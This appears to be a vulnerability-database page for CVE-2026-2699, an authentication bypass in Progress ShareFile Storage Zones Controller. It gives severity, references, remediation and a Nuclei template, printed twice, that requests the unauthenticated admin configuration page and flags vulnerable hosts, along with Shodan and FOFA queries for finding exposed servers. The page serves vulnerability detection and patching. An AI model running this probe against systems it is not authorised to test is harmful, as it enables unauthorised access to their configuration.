Progress ShareFile Storage Zones Controller - Authentication Bypass

CVE-2026-2699

Verified

Description

Customer Managed ShareFile Storage Zones Controller (SZC) contains an authentication bypass (Execution After Redirect) that allows unauthenticated attackers to access restricted configuration pages. This leads to changing system configuration and potential remote code execution.

Severity

Critical

CVSS Score

9.8

Exploit Probability

42%

Affected Product

sharefile_storage_zones_controller

Published Date

April 6, 2026

Template Author

dhiyaneshdk

CVE-2026-2699.yaml

id: CVE-2026-2699

info:
  name: Progress ShareFile Storage Zones Controller - Authentication Bypass
  author: DhiyaneshDk
  severity: critical
  description: |
    Customer Managed ShareFile Storage Zones Controller (SZC) contains an authentication bypass (Execution After Redirect) that allows unauthenticated attackers to access restricted configuration pages. This leads to changing system configuration and potential remote code execution.
  impact: |
    Unauthenticated attackers can change system configuration and potentially execute remote code, leading to full system compromise.
  remediation: Update ShareFile Storage Zones Controller to version 5.12.4 or later.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-Progress-ShareFile-CVE-2026-2699
    - https://labs.watchtowr.com/youre-not-supposed-to-sharefile-with-everyone-progress-sharefile-pre-auth-rce-chain-cve-2026-2699-cve-2026-2701/
    - https://docs.sharefile.com/en-us/storage-zones-controller/5-0/security-vulnerability-feb26
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-2699
    cwe-id: CWE-284
    epss-score: 0.41586
    epss-percentile: 0.97471
  metadata:
    verified: true
    max-request: 1
    vendor: progress
    product: sharefile_storage_zones_controller
    fofa-query: title=="ShareFile Storage Server"
    shodan-query: title:"ShareFile Storage Server"
  tags: cve,cve2026,progress,sharefile,auth-bypass

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: word
        part: body
        words:
          - "ShareFile Storage Server"
        internal: true

  - raw:
      - |
        GET /ConfigService/Admin.aspx HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'content_length >= 10000'
        condition: and
# digest: 4a0a004730450221008f715850770456438685398d582ebe2d7f60a1ca3fad95fe4c8153d1eefc8fca02204b2a044c64a094545d048f768046e87fd1030602536bf0d623062c9dff0d1424:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2026-2699

CWE ID:

cwe-284

References

https://github.com/watchtowrlabs/watchTowr-vs-Progress-ShareFile-CVE-2026-2699 https://labs.watchtowr.com/youre-not-supposed-to-sharefile-with-everyone-progress-sharefile-pre-auth-rce-chain-cve-2026-2699-cve-2026-2701/https://docs.sharefile.com/en-us/storage-zones-controller/5-0/security-vulnerability-feb26

Remediation Steps

Update ShareFile Storage Zones Controller to version 5.12.4 or later.

id: CVE-2026-2699

info:
  name: Progress ShareFile Storage Zones Controller - Authentication Bypass
  author: DhiyaneshDk
  severity: critical
  description: |
    Customer Managed ShareFile Storage Zones Controller (SZC) contains an authentication bypass (Execution After Redirect) that allows unauthenticated attackers to access restricted configuration pages. This leads to changing system configuration and potential remote code execution.
  impact: |
    Unauthenticated attackers can change system configuration and potentially execute remote code, leading to full system compromise.
  remediation: Update ShareFile Storage Zones Controller to version 5.12.4 or later.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-Progress-ShareFile-CVE-2026-2699
    - https://labs.watchtowr.com/youre-not-supposed-to-sharefile-with-everyone-progress-sharefile-pre-auth-rce-chain-cve-2026-2699-cve-2026-2701/
    - https://docs.sharefile.com/en-us/storage-zones-controller/5-0/security-vulnerability-feb26
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-2699
    cwe-id: CWE-284
    epss-score: 0.41586
    epss-percentile: 0.97471
  metadata:
    verified: true
    max-request: 1
    vendor: progress
    product: sharefile_storage_zones_controller
    fofa-query: title=="ShareFile Storage Server"
    shodan-query: title:"ShareFile Storage Server"
  tags: cve,cve2026,progress,sharefile,auth-bypass

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: word
        part: body
        words:
          - "ShareFile Storage Server"
        internal: true

  - raw:
      - |
        GET /ConfigService/Admin.aspx HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'content_length >= 10000'
        condition: and
# digest: 4a0a004730450221008f715850770456438685398d582ebe2d7f60a1ca3fad95fe4c8153d1eefc8fca02204b2a044c64a094545d048f768046e87fd1030602536bf0d623062c9dff0d1424:922c64590222798bb761d5b6d8e72950

Progress ShareFile Storage Zones Controller - Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Progress ShareFile Storage Zones Controller - Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps